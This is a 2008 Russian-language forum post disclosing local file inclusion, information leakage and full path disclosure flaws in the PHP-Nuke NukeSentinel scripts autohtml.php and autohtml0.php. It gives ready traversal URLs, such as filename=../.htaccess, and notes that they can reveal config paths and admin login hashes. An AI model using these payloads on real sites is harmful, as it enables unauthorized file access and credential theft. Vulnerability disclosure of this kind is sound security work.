19.01.2008, 03:05
|
|
Banned
Регистрация: 19.12.2007
Сообщений: 924
С нами:
9681386
Репутация:
2145
|
|
PHP-NUKE NukeSentinel Module
Уязвимости в скриптах autohtml.php и autohtml0.php в параметре filename.
[Local File Inclusion]
PHP код:
http://site/autohtml.php?filename=../file.php
http://site/autohtml0.php?filename=../file.php
[Information Leakage]
PHP код:
http://site/autohtml.php?filename=../.htaccess
http://site/autohtml0.php?filename=../.htaccess
С помощью локального инклюда можно обнаружить важную информацию на сервере. В частности в .htaccess можно узнать настройки сайта, в том числе полный путь (что будет full path disclosure), при использовании NukeSentinel на сайте. А также можно обнаружить путь к его конфигурации и получить логины и хэши админов.
[Full path disclosure]
PHP код:
http://site/autohtml.php?filename=12345
На некоторых сайтах с данным скриптом, где не отключено выведение ошибок, при указании несуществующего файла выводится сообщение об ошибке с полным путём к скрипту.
(c) MustLive <mustlive_(at)_websecurity.com.ua>
Последний раз редактировалось iddqd; 19.01.2008 в 03:22..
|
|
|